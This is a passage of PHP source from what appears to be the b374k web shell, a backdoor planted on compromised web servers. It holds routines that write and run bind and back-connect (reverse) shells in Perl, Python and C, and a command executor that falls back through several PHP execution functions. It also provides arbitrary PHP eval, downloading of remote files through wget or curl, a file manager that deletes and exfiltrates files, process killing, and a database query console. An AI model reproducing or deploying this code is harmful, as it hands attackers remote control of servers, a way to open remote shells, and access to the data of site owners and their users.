90.                 $res = exe("perl " . $fpath . " " . $target);
91.             } else
92.                 $result = $errperm;
93.         } else
94.             $result = $errperm;
95.     } elseif ($type == "xbind_py") {
96.         $fname = "b374k_bind.py";
97.         $fpath = $d . $fname;
98.         if (is_file($fpath))
99.             unlink($fpath); if ($file = fopen($fpath, "w")) {
100.             fwrite($file, $fc);
101.             fclose($file);
102.             if (is_file($fpath)) {
103.                 $res = exe("chmod +x " . $fpath);
104.                 $res = exe("python " . $fpath . " " . $target);
105.             } else
106.                 $result = $errperm;
107.         } else
108.             $result = $errperm;
109.     } elseif ($type == "xbind_bin") {
110.         $fname = "b374k_bind";
111.         $fpath = $d . $fname;
112.         if (!$s_win) {
113.             if (is_file($fpath))
114.                 unlink($fpath); if (is_file($fpath . ".c"))
115.                 unlink($fpath . ".c"); if ($file = fopen($fpath . ".c", "w")) {
116.                 fwrite($file, $fc);
117.                 fclose($file);
118.                 if (is_file($fpath . ".c")) {
119.                     $res = exe("gcc " . $fpath . ".c -o " . $fpath);
120.                     if (is_file($fpath)) {
121.                         $res = exe("chmod +x " . $fpath);
122.                         $res = exe($fpath . " " . $target);
123.                     } else
124.                         $result = $errgcc;
125.                 } else
126.                     $result = $errperm;
127.             } else
128.                 $result = $errperm;
129.         } else {
130.             $fpath = $fpath . ".exe";
131.             if (is_file($fpath))
132.                 unlink($fpath); if ($file = fopen($fpath, "w")) {
133.                 fwrite($file, $fc);
134.                 fclose($file);
135.                 if (is_file($fpath)) {
136.                     $res = exe("\"" . $fpath . "\" " . $target);
137.                 } else
138.                     $result = $errperm;
139.             } else
140.                 $result = $errperm;
141.         }
142.     } elseif ($type == "xback_pl") {
143.         $fname = "b374k_back.pl";
144.         $fpath = $d . $fname;
145.         $tar = explode(" ", $target, 2);
146.         if (is_file($fpath))
147.             unlink($fpath); if ($file = fopen($fpath, "w")) {
148.             fwrite($file, $fc);
149.             fclose($file);
150.             if (is_file($fpath)) {
151.                 $res = exe("chmod +x " . $fpath);
152.                 $res = exe("perl " . $fpath . " " . $target);
153.             } else
154.                 $result = $errperm;
155.         } else
156.             $result = $errperm;
157.     } elseif ($type == "xback_py") {
158.         $fname = "b374k_back.py";
159.         $fpath = $d . $fname;
160.         $tar = explode(" ", $target, 2);
161.         if (is_file($fpath))
162.             unlink($fpath); if ($file = fopen($fpath, "w")) {
163.             fwrite($file, $fc);
164.             fclose($file);
165.             if (is_file($fpath)) {
166.                 $res = exe("chmod +x " . $fpath);
167.                 $res = exe("python " . $fpath . " " . $target);
168.             } else
169.                 $result = $errperm;
170.         } else
171.             $result = $errperm;
172.     } elseif ($type == "xback_bin") {
173.         $fname = "b374k_back";
174.         $fpath = $d . $fname;
175.         $tar = explode(" ", $target, 2);
176.         if (!$s_win) {
177.             if (is_file($fpath))
178.                 unlink($fpath); if (is_file($fpath . ".c"))
179.                 unlink($fpath . ".c"); if ($file = fopen($fpath . ".c", "w")) {
180.                 fwrite($file, $fc);
181.                 fclose($file);
182.                 if (is_file($fpath . ".c")) {
183.                     $res = exe("gcc " . $fpath . ".c -o " . $fpath);
184.                     if (is_file($fpath)) {
185.                         $res = exe("chmod +x " . $fpath);
186.                         $res = exe($fpath . " " . $target);
187.                     } else
188.                         $result = $errgcc;
189.                 } else
190.                     $result = $errperm;
191.             } else
192.                 $result = $errperm;
193.         } else {
194.             $fpath = $fpath . ".exe";
195.             if (is_file($fpath))
196.                 unlink($fpath); if ($file = fopen($fpath, "w")) {
197.                 fwrite($file, $fc);
198.                 fclose($file);
199.                 if (is_file($fpath)) {
200.                     $res = exe($fpath . " " . $target);
201.                 } else
202.                     $result = $errperm;
203.             } else
204.                 $result = $errperm;
205.         }
206.     } return $result;
207. }
208.  
209. function gs($f) {
210.     if ($s = filesize($f)) {
211.         if ($s <= 1024)
212.             return $s; else {
213.             if ($s <= 1024 * 1024) {
214.                 $s = round($s / 1024, 2);
215.                 ;
216.                 return $s . " kb";
217.             } else {
218.                 $s = round($s / 1024 / 1024, 2);
219.                 return $s . " mb";
220.             }
221.         }
222.     } else
223.         return "???";
224. }
225.  
226. function gp($f) {
227.     if ($m = fileperms($f)) {
228.         $p = '';
229.         $p .= ($m & 00400) ? 'r' : '-';
230.         $p .= ($m & 00200) ? 'w' : '-';
231.         $p .= ($m & 00100) ? 'x' : '-';
232.         $p .= ($m & 00040) ? 'r' : '-';
233.         $p .= ($m & 00020) ? 'w' : '-';
234.         $p .= ($m & 00010) ? 'x' : '-';
235.         $p .= ($m & 00004) ? 'r' : '-';
236.         $p .= ($m & 00002) ? 'w' : '-';
237.         $p .= ($m & 00001) ? 'x' : '-';
238.         return $p;
239.     } else
240.         return "??????????";
241. }
242.  
243. function exe($c) {
244.     if (function_exists('system')) {
245.         ob_start();
246.         system($c);
247.         $b = ob_get_contents();
248.         ob_end_clean();
249.         return $b;
250.     } elseif (function_exists('shell_exec')) {
251.         $b = shell_exec($c);
252.         return $b;
253.     } elseif (function_exists('exec')) {
254.         exec($c, $r);
255.         $b = "";
256.         foreach ($r as $s) {
257.             $b .= $s;
258.         } return $b;
259.     } elseif (function_exists('passthru')) {
260.         ob_start();
261.         passthru($c);
262.         $b = ob_get_contents();
263.         ob_end_clean();
264.         return $b;
265.     } return "";
266. }
267.  
268. function cp($p) {
269.     if (is_dir($p)) {
270.         $x = DIRECTORY_SEPARATOR;
271.         while (substr($p, -1) == $x)
272.             $p = rtrim($p, $x); return $p . $x;
273.     } return $p;
274. }
275.  
276. function rmdirs($d) {
277.     $f = glob($d . '*', GLOB_MARK);
278.     foreach ($f as $z) {
279.         if (is_dir($z))
280.             rmdirs($z); else
281.             unlink($z);
282.     } if (is_dir($d))
283.         rmdir($d);
284. }
285.  
286. function xwhich($pr) {
287.     $p = exe("which $pr");
288.     if (trim($p) != "") {
289.         return trim($p);
290.     } else {
291.         return trim($pr);
292.     }
293. }
294.  
295. function dlfile($u, $p) {
296.     $n = basename($u);
297.     if ($t = file_get_contents($u)) {
298.         if (is_file($p))
299.             unlink($p);;
300.         if ($f = fopen($p, "w")) {
301.             fwrite($f, $t);
302.             fclose($f);
303.             if (is_file($p))
304.                 return true;
305.         }
306.     } exe(xwhich('wget') . " " . $u . " -O " . $p);
307.     if (is_file($p))
308.         return true; exe(xwhich('lwp-download') . " " . $u . " " . $p);
309.     if (is_file($p))
310.         return true; exe(xwhich('lynx') . " -source " . $u . " > " . $p);
311.     if (is_file($p))
312.         return true; exe(xwhich('curl') . " " . $u . " -o " . $p);
313.     if (is_file($p))
314.         return true; return false;
315. }
316.  
317. function showdir($pwd, $prompt, $win) {
318.     if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
319.         $posix = TRUE; else
320.         $posix = FALSE; $user = "????:????";
321.     $fname = array();
322.     $dname = array();
323.     if ($dh = scandir($pwd)) {
324.         foreach ($dh as $file) {
325.             if (is_dir($file))
326.                 $dname[] = $file; elseif (is_file($file))
327.                 $fname[] = $file;
328.         }
329.     } else {
330.         if ($dh = opendir($pwd)) {
331.             while ($file = readdir($dh)) {
332.                 if (is_dir($file))
333.                     $dname[] = $file; elseif (is_file($file))
334.                     $fname[] = $file;
335.             } closedir($dh);
336.         }
337.     } sort($fname);
338.     sort($dname);
339.     $path = explode(DIRECTORY_SEPARATOR, $pwd);
340.     $tree = sizeof($path);
341.     $parent = "";
342.     $buff = "
343. <table class=\"explore sortable\">
344. <tr><th>name</th><th style=\"width:60px;\">size</th><th style=\"width:100px;\">owner : group</th><th style=\"width:70px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:210px;\">actions</th></tr>
345. ";
346.     if ($tree > 2)
347.         for ($i = 0; $i < $tree - 2; $i++)
348.             $parent .= $path[$i] . DIRECTORY_SEPARATOR; else
349.         $parent = $pwd; foreach ($dname as $folder) {
350.         if ($folder == ".") {
351.             if (!$win && $posix) {
352.                 $name = posix_getpwuid(fileowner($folder));
353.                 $group = posix_getgrgid(filegroup($folder));
354.                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
355.             } else {
356.                 $owner = $user;
357.             } $buff .= "<tr><td><a href=\"?d=" . $pwd . "\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($pwd) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($pwd)) . "</td><td><span id=\"titik1\"><a href=\"?d=$pwd&amp;edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a> | <a href=\"?upload&amp;d=$pwd\">upload</a></span>
358. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
359. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
360. <input class=\"inputz\" id=\"titik1_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
361. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
362. </form></td></tr>
363. ";
364.         } elseif ($folder == "..") {
365.             if (!$win && $posix) {
366.                 $name = posix_getpwuid(fileowner($folder));
367.                 $group = posix_getgrgid(filegroup($folder));
368.                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
369.             } else {
370.                 $owner = $user;
371.             } $buff .= "<tr><td><a href=\"?d=" . $parent . "\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($parent) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($parent)) . "</td><td><span id=\"titik2\"><a href=\"?d=$pwd&amp;edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a> | <a href=\"?upload&amp;d=$parent\">upload</a></span>
372. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
373. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
374. <input class=\"inputz\" id=\"titik2_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
375. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
376. </form>
377. </td></tr>";
378.         } else {
379.             if (!$win && $posix) {
380.                 $name = posix_getpwuid(fileowner($folder));
381.                 $group = posix_getgrgid(filegroup($folder));
382.                 $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
383.             } else {
384.                 $owner = $user;
385.             } $buff .= "<tr><td><a id=\"" . cs($folder) . "_link\" href=\"?d=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\">[ $folder ]</a>
386. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"" . cs($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
387. <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />
388. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
389. <input class=\"inputz\" style=\"width:200px;\" id=\"" . cs($folder) . "_link_\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" />
390. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
391. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . cs($folder) . "_form','" . cs($folder) . "_link');\" />
392. </form>
393. <td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($pwd . $folder) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . cs($folder) . "_link','" . cs($folder) . "_form');\">rename</a> | <a href=\"?d=" . $pwd . "&amp;rmdir=" . $pwd . $folder . "\">delete</a> | <a href=\"?upload&amp;d=" . $pwd . $folder . "\">upload</a></td></tr>";
394.         }
395.     } foreach ($fname as $file) {
396.         $full = $pwd . $file;
397.         if (!$win && $posix) {
398.             $name = posix_getpwuid(fileowner($full));
399.             $group = posix_getgrgid(filegroup($full));
400.             $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
401.         } else {
402.             $owner = $user;
403.         } $buff .= "<tr><td><a id=\"" . cs($file) . "_link\" href=\"?d=$pwd&amp;view=$full\">$file</a>
404. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"" . cs($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
405. <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
406. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
407. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" id=\"" . cs($file) . "_link_\" name=\"newname\" value=\"" . $file . "\" />
408. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
409. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . cs($file) . "_link','" . cs($file) . "_form');\" />
410. </form>
411. </td><td>" . gs($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($full) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($full)) . "</td>
412. <td><a href=\"?d=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('" . cs($file) . "_link','" . cs($file) . "_form');\">rename</a> | <a href=\"?d=$pwd&amp;delete=$full\">delete</a> | <a href=\"?d=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?d=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
413.     } $buff .= "</table>";
414.     return $buff;
415. }
416.  
417. if (isset($_REQUEST['favicon'])) {
418.     $data = gzinflate(base64_decode($favicon));
419.     header("Content-type: image/png");
420.     header("Cache-control: public");
421.     echo $data;
422.     exit;
423. } if ($s_auth) {
424.     $s_software = getenv("SERVER_SOFTWARE");
425.     if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on")
426.         $s_safemode = TRUE; else
427.         $s_safemode = FALSE; $s_system = php_uname();
428.     $s_win = FALSE;
429.     if (strtolower(substr($s_system, 0, 3)) == "win")
430.         $s_win = TRUE; $letters = '';
431.     if (!$s_win) {
432.         if (!$s_user = rp(exe("whoami")))
433.             $s_user = ""; if (!$s_id = rp(exe("id")))
434.             $s_id = ""; $pwd = getcwd() . DIRECTORY_SEPARATOR;
435.     } else {
436.         $s_user = get_current_user();
437.         $s_id = $s_user;
438.         $pwd = realpath(".") . "\\";
439.         $v = explode("\\", $d);
440.         $v = $v[0];
441.         foreach (range("A", "Z") as $letter) {
442.             $bool = @is_dir($letter . ":\\");
443.             if ($bool) {
444.                 $letters .= "<a href=\"?d=" . $letter . ":\\\">[ ";
445.                 if ($letter . ":" != $v) {
446.                     $letters .= $letter;
447.                 } else {
448.                     $letters .= "<span class=\"gaya\">" . $letter . "</span>";
449.                 } $letters .= " ]</a> ";
450.             }
451.         }
452.     } $s_prompt = $s_user . " &gt;";
453.     if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
454.         $s_posix = TRUE; else
455.         $s_posix = FALSE; $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
456.     $s_my_ip = $_SERVER['REMOTE_ADDR'];
457.     if (isset($_REQUEST['d'])) {
458.         $d = ss($_REQUEST['d']);
459.         if (is_dir($d)) {
460.             chdir($d);
461.             $pwd = cp($d);
462.         }
463.     } else
464.         $pwd = cp(getcwd()); if (isset($_REQUEST['sorttable'])) {
465.         $data = gzinflate(base64_decode($sortable_js));
466.         header("Content-type: text/plain");
467.         header("Cache-control: public");
468.         echo $data;
469.         exit;
470.     } if (isset($_REQUEST['dl']) && ($_REQUEST['dl'] != "")) {
471.         $f = ss($_REQUEST['dl']);
472.         $fc = file_get_contents($f);
473.         header("Content-type: application/octet-stream");
474.         header("Content-length: " . strlen($fc));
475.         header("Content-disposition: attachment; filename=\"" . basename($f) . "\";");
476.         echo $fc;
477.         exit;
478.     } elseif (isset($_REQUEST['dlgzip']) && ($_REQUEST['dlgzip'] != "")) {
479.         $f = ss($_REQUEST['dlgzip']);
480.         $fc = gzencode(file_get_contents($f));
481.         header("Content-Type:application/x-gzip\n");
482.         header("Content-length: " . strlen($fc));
483.         header("Content-disposition: attachment; filename=\"" . basename($f) . ".gz\";");
484.         echo $fc;
485.         exit;
486.     } if (isset($_REQUEST['pid'])) {
487.         $p = ss($_REQUEST['pid']);
488.         if (function_exists("posix_kill"))
489.             posix_kill($p, '9'); else {
490.             exe("kill -9 " . $p);
491.             exe("taskkill /F /PID " . $p);
492.         }
493.     } if (isset($_REQUEST['img'])) {
494.         ob_clean();
495.         $d = ss($_REQUEST['d']);
496.         $f = ss($_REQUEST['img']);
497.         $inf = getimagesize($d . $f);
498.         $ext = explode($f, ".");
499.         $ext = $ext[count($ext) - 1];
500.         header("Content-type: " . $inf["mime"]);
501.         header("Cache-control: public");
502.         header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
503.         header("Cache-control: max-age=" . (60 * 60 * 24 * 7));
504.         readfile($d . $f);
505.         exit;
506.     } if (isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])) {
507.         $old = ss($_REQUEST['oldname']);
508.         $new = ss($_REQUEST['newname']);
509.         rename($pwd . $old, $pwd . $new);
510.         $fnew = $pwd . $new;
511.     } if (isset($_REQUEST['delete']) && ($_REQUEST['delete'] != "")) {
512.         $f = ss($_REQUEST['delete']);
513.         if (is_file($f))
514.             unlink($f);
515.     } elseif (isset($_REQUEST['rmdir']) && ($_REQUEST['rmdir'] != "")) {
516.         $f = ss(rtrim(ss($_REQUEST['rmdir'], DIRECTORY_SEPARATOR)));
517.         if (is_dir($f))
518.             rmdirs($f);
519.     } elseif (isset($_REQUEST['mkdir']) && ($_REQUEST['mkdir'] != "")) {
520.         $f = ss($pwd . ss($_REQUEST['mkdir']));
521.         if (!is_dir($f))
522.             mkdir($f);
523.     } $s_result = "";
524.     if (isset($_REQUEST['eval'])) {
525.         $c = "";
526.         if (isset($_REQUEST['evalcode'])) {
527.             $eval_addition = "error_reporting(E_ALL);@ini_set(\"display_errors\", 1);";
528.             $c = ss($_REQUEST['evalcode']);
529.             ob_start();
530.             eval(eval($eval_addition) . eval($c));
531.             $b = ob_get_contents();
532.             ob_end_clean();
533.             $code = $b;
534.         } $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
535. <textarea id=\"evalcode\" name=\"evalcode\" class=\"evalcode\">" . htmlspecialchars($code) . "</textarea>
536. <p><input type=\"submit\" name=\"evalcodesubmit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" /></p>
537. <input type=\"hidden\" name=\"eval\" value=\"\" />
538. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
539. </form>
540. ";
541.     } elseif (isset($_REQUEST['upload'])) {
542.         $s_result = " ";
543.         $msg = "";
544.         if (isset($_REQUEST['uploadhd'])) {
545.             $fn = $_FILES['filepath']['name'];
546.             if (is_uploaded_file($_FILES['filepath']['tmp_name'])) {
547.                 $p = cp(ss($_REQUEST['savefolder']));
548.                 if (!is_dir($p))
549.                     $p = cp(dirname($p)); if (isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename']) != ""))
550.                     $fn = ss($_REQUEST['savefilename']); $tm = $_FILES['filepath']['tmp_name'];
551.                 $pi = cp($p) . $fn;
552.                 $st = move_uploaded_file($tm, $pi);
553.                 if ($st)
554.                     $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=" . $pwd . "&amp;view=" . $pi . "\">" . $pi . "</a></p>"; else
555.                     $msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
556.             } else
557.                 $msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
558.         } elseif (isset($_REQUEST['uploadurl'])) {
559.             $p = cp(ss($_REQUEST['savefolderurl']));
560.             if (!is_dir($p))
561.                 $p = cp(dirname($p)); $fu = ss($_REQUEST['fileurl']);
562.             $fn = basename($fu);
563.             if (isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl']) != ""))
564.                 $fn = ss($_REQUEST['savefilenameurl']); $fp = cp($p) . $fn;
565.             $st = dlfile($fu, $fp);
566.             if ($st)
567.                 $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=" . $pwd . "&amp;view=" . $fp . "\">" . $fp . "</a></p>"; else
568.                 $msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
569.         } $s_result .= $msg;
570.         $s_result .= "
571. <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\" enctype=\"multipart/form-data\">
572. <div class=\"mybox\"><h2>Upload from computer</h2>
573. <table class=\"myboxtbl\">
574. <tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />
575. </td></tr>
576. <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"" . $pwd . "\" /></td></tr>
577. <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>
578. <tr><td>&nbsp;</td><td>
579. <input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
580. </td></tr>
581.  
582. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
583. </table>
584. </div>
585. </form>
586.  
587. <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\">
588. <div class=\"mybox\"><h2>Upload from internet</h2>
589. <table class=\"myboxtbl\">
590. <tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />
591. </td></tr>
592. <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"" . $pwd . "\" /></td></tr>
593. <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>
594. <tr><td>&nbsp;</td><td>
595. <input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
596. </td></tr>
597.  
598. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
599. </table>
600. </div>
601. </form>
602.  
603. ";
604.     } elseif (isset($_REQUEST['phpinfo'])) {
605.         ob_start();
606.         eval("phpinfo();");
607.         $b = ob_get_contents();
608.         ob_end_clean();
609.         $a = strpos($b, "<body>") + 6;
610.         $z = strpos($b, "</body>");
611.         $s_result = "<div class=\"phpinfo\">" . substr($b, $a, $z - $a) . "</div>";
612.     } elseif (isset($_REQUEST['db'])) {
613.         $sqlhost = $sqlhost1 = $sqlhost2 = $sqlhost3 = $sqlhost4 = 'localhost';
614.         $sqluser = $sqluser1 = $sqluser2 = $sqluser3 = $sqluser4 = $odbcuser = $odbcdsn = $pdodsn = $pdouser = '';
615.         $sqlport = $sqlport1 = $sqlport2 = $sqlport3 = $sqlport4 = '';
616.         $sqlpass = $sqlpass1 = $sqlpass2 = $sqlpass3 = $sqlpass4 = $odbcpass = $pdopass = '';
617.         if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqlhost1']))
618.             $sqlhost = $sqlhost1 = ss($_REQUEST['sqlhost1']); if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqlhost2']))
619.             $sqlhost = $sqlhost2 = ss($_REQUEST['sqlhost2']); if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqlhost3']))
620.             $sqlhost = $sqlhost3 = ss($_REQUEST['sqlhost3']); if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqlhost4']))
621.             $sqlhost = $sqlhost4 = ss($_REQUEST['sqlhost4']); if (isset($_REQUEST['odbccon']) && isset($_REQUEST['odbcdsn']))
622.             $odbcdsn = ss($_REQUEST['odbcdsn']); if (isset($_REQUEST['pdocon']) && isset($_REQUEST['pdodsn']))
623.             $pdodsn = ss($_REQUEST['pdodsn']); if (isset($_REQUEST['sqlhost']))
624.             $sqlhost = ss($_REQUEST['sqlhost']); if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqluser1']))
625.             $sqluser = $sqluser1 = ss($_REQUEST['sqluser1']); if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqluser2']))
626.             $sqluser = $sqluser2 = ss($_REQUEST['sqluser2']); if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqluser3']))
627.             $sqluser = $sqluser3 = ss($_REQUEST['sqluser3']); if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqluser4']))
628.             $sqluser = $sqluser4 = ss($_REQUEST['sqluser4']); if (isset($_REQUEST['odbccon']) && isset($_REQUEST['odbcuser']))
629.             $odbcuser = ss($_REQUEST['odbcuser']); if (isset($_REQUEST['pdocon']) && isset($_REQUEST['pdouser']))
630.             $pdouser = ss($_REQUEST['pdouser']); if (isset($_REQUEST['sqluser']))
631.             $sqluser = ss($_REQUEST['sqluser']); if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqlport1']))
632.             $sqlport = $sqlport1 = ss($_REQUEST['sqlport1']); if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqlport2']))
633.             $sqlport = $sqlport2 = ss($_REQUEST['sqlport2']); if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqlport3']))
634.             $sqlport = $sqlport3 = ss($_REQUEST['sqlport3']); if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqlport4']))
635.             $sqlport = $sqlport4 = ss($_REQUEST['sqlport4']); if (isset($_REQUEST['sqlport']))
636.             $sqlport = ss($_REQUEST['sqlport']); if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqlpass1']))
637.             $sqlpass = $sqlpass1 = ss($_REQUEST['sqlpass1']); if (isset($_REQUEST['mssqlcon']) && isset($_REQUEST['sqlpass2']))
638.             $sqlpass = $sqlpass2 = ss($_REQUEST['sqlpass2']); if (isset($_REQUEST['pgsqlcon']) && isset($_REQUEST['sqlpass3']))
639.             $sqlpass = $sqlpass3 = ss($_REQUEST['sqlpass3']); if (isset($_REQUEST['oraclecon']) && isset($_REQUEST['sqlpass4']))
640.             $sqlpass = $sqlpass4 = ss($_REQUEST['sqlpass4']); if (isset($_REQUEST['odbccon']) && isset($_REQUEST['odbcpass']))
641.             $odbcpass = ss($_REQUEST['odbcpass']); if (isset($_REQUEST['pdocon']) && isset($_REQUEST['pdopass']))
642.             $pdopass = ss($_REQUEST['pdopass']); if (isset($_REQUEST['sqlpass']) && isset($_REQUEST['sqlpass']))
643.             $sqlpass = ss($_REQUEST['sqlpass']); $sqls = "";
644.         $q_result = "";
645.         $hostandport = $sqlhost;
646.         if (trim($sqlport) != "")
647.             $hostandport = $sqlhost . ":" . $sqlport; if (isset($_REQUEST['mysqlcon']) && ($con = mysql_connect($hostandport, $sqluser, $sqlpass))) {
648.             if (isset($_REQUEST['sqlcode'])) {
649.                 $sqls = ss($_REQUEST['sqlcode']);
650.                 $querys = explode(";", $sqls);
651.                 foreach ($querys as $query) {
652.                     if (trim($query) != "") {
653.                         $hasil = mysql_query($query);
654.                         if ($hasil) {
655.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
656. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
657. <table class=\"explore\" style=\"width:99%;\"><tr>";
658.                             for ($i = 0; $i < mysql_num_fields($hasil); $i++)
659.                                 $q_result .= "<th>" . htmlspecialchars(mysql_field_name($hasil, $i)) . "</th>"; $q_result .= "</tr>";
660.                             while ($rows = mysql_fetch_array($hasil)) {
661.                                 $q_result .= "<tr>";
662.                                 for ($j = 0; $j < mysql_num_fields($hasil); $j++) {
663.                                     if ($rows[$j] == "")
664.                                         $dataz = " "; else
665.                                         $dataz = $rows[$j]; $q_result .= "<td>" . htmlspecialchars($dataz) . "</td>";
666.                                 } $q_result .= "</tr>";
667.                             } $q_result .= "</table>";
668.                         } else
669.                             $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . ";&nbsp;&nbsp;&nbsp;
670. <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
671.                     }
672.                 }
673.             } else
674.                 $sqls = "SHOW databases;"; $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
675. <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" />
676. <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" />
677. <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" />
678. <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" />
679. <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />
680. <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">" . $sqls . "</textarea>
681. <p><input type=\"submit\" name=\"mysqlcon\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
682. &nbsp;&nbsp;Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
683. </form>";
684.             $s_result .= "<div>" . $q_result . "</div>";
685.             if ($con)
686.                 mysql_close($con);
